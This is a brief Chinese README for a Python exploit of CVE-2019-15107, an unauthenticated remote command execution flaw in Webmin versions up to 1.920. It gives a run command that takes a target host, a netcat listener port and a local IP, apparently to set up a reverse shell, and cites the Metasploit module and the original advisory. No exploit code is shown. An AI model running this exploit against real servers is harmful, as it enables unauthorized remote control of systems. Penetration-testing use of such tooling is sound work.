CVE-2019-15107 针对 webmin <= webmin 1.920 未经身份验证的远程命令执行漏洞的 Python 实现。
可以通过以下命令运行:
python exploit.py <攻击目标主机> <nc 监听端口> <本地 IP 地址>
基于 Metasploit 模块 https://www.exploit-db.com/exploits/47230
原始安全公告:https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html